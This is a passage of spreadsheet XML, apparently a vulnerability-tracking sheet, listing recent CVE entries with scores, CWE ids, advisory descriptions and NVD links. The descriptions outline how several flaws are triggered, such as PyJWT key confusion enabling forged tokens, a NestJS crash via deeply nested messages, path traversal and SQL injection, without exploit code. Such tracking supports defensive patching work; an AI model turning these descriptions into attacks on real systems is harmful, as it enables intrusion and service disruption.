      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.20, 2.1.6, 3.0.8, and 5.0.11, deeply nested brace groups cause expand_() to recurse once per nesting level at comma-member and single-set expansion sites, exhausting the native stack before output limits can apply and potentially terminating the Node.js process. expand_ performs uncontrolled recursion for nested brace alternatives and single-part sets. deeply nested brace groups supplied as an untrusted pattern. expand_ is affected. expand is affected. Comma members is affected. Single set is affected. native stack exhaustion during nested sub-expansion. process-terminating denial of service. This issue is fixed in versions 1.1.20, 2.1.6, 3.0.8, and 5.0.11.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102278</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102281</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-674</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>Nest is a framework for building scalable Node.js server-side applications. Prior to 11.2.4 and 12.0.2, a single message with a deeply nested object in its pattern can terminate a NestJS microservice using the TCP or RabbitMQ transport. ServerTCP#handleMessage and ServerRMQ#handleMessage pass a client-controlled non-string pattern to JSON.stringify to derive the handler lookup key; sufficiently deep nesting throws RangeError: Maximum call stack size exceeded, and the unhandled promise rejection terminates Node.js under its default behavior. An attacker who can reach the TCP port or publish to the consumed RabbitMQ queue or exchange can crash the service on demand; other transports are not affected because their patterns arrive as strings. This issue is fixed in versions 11.2.4 and 12.0.2.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102281</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.6 and 1.14.5, getAuthContext does not distinguish authorized from unauthorized peer certificates when server credentials set requireClientCertificate to false. When applications use the returned authentication context, they can treat an unauthorized certificate as authorized, causing improper authentication. @grpc/grpc-js-xds can reach this condition when RBAC authentication is enabled in affected configurations. This issue is fixed in version 1.14.5 and 1.13.6.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102243</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in MODSetter SurfSense up to 2.0.3. This issue affects some unknown processing of the file /api/search-source/connectors/mcp/test of the component MCP Connector Integration. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102243</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102266</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>python, go, rust</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.from_jwk is affected because PyJWK verification path used the decoded key without applying prepare_key validation. This occurs when a trusted JWK Set contains an oct entry with an empty k value. As a result, an attacker signs an HMAC token with the same zero-length key accepted by PyJWT. Consequently, forged token can carry arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102266</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102267</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>python, rust</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT PyJWKClient is affected because redirect destinations are not revalidated against the JWKS trust boundary. This occurs when a configured trusted JWKS endpoint returns an attacker-influenced redirect. As a result, PyJWKClient follows the redirect and consumes the redirected response as key material. Consequently, forwarded credentials may be disclosed or verification keys may be substituted. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102267</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102271</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.4.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because asymmetric-key guard relies on textual markers that are absent from DER encoding. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a DER public key as the shared verification key. As a result, PyJWT uses public DER bytes as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102271</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102272</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.prepare_key in jwt/algorithms.py is affected because raw-JWK detector does not normalize accepted Unicode byte-order marks before checking for JSON. This occurs when a public JWK is prefixed with a UTF-8 BOM and used in a mixed-algorithm verification path. As a result, public JWK bypasses asymmetric-key detection and becomes the HMAC secret. Consequently, an attacker who knows the public key can forge authenticated tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102272</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102273</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because HMAC key guard only recognizes top-level public JWK forms and misses container representations. This occurs when an application allows HMAC and asymmetric algorithms and passes a public JWK container as the raw key. As a result, public asymmetric key material is accepted as the HMAC secret. Consequently, an attacker who knows the public key can forge a token with arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102273</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102334</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>nginx, gin</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Nginx Proxy Manager through 2.16.0 lacks rate-limiting on authentication endpoints, allowing unauthenticated attackers to make unlimited password guesses against any account. Attackers can brute-force login credentials via POST /api/tokens and subsequently guess TOTP codes via POST /api/tokens/2fa to gain full session access and administrative control.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102334</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82375</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) in Apache Roller 6.1.5 allows an authenticated user with entry-editing rights on a weblog to cause outbound HTTP requests to attacker-chosen destinations through legacy outbound Trackback and entry enclosure handling. The Trackback control is hidden in the standard UI, but its action remains directly reachable; the enclosure path is relevant only when an author supplies an enclosure URL. No non-default server configuration is required, and the default empty Trackback allow-list permits all destinations. Requests can reach loopback and private-network addresses, while enclosure handling exposes response status, content type, and length. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes the outbound trackback action and stops dereferencing enclosure URLs.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82375</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101012</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file makeresult.php. This manipulation of the argument makeid causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101012</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101015</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-20</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this issue is some unknown functionality of the file policy.c of the component Domain Handler. Executing a manipulation can lead to improper validation of unsafe equivalence in input. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101015</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101066</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in dbgate up to 7.3.1. The impacted element is the function createLink of the file packages/api/src/controllers/archive.js of the component Archive Link Creation. This manipulation of the argument linkedFolder causes path traversal. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101066</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101067</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in dbgate up to 6.8.1/7.0.2/7.1.8/7.2.5/7.3.1. This affects the function saveUploadedFile of the file files.js of the component save-uploaded-file Endpoint. Such manipulation of the argument filePath/fileName leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101067</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101280</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.3</v>
      </c>
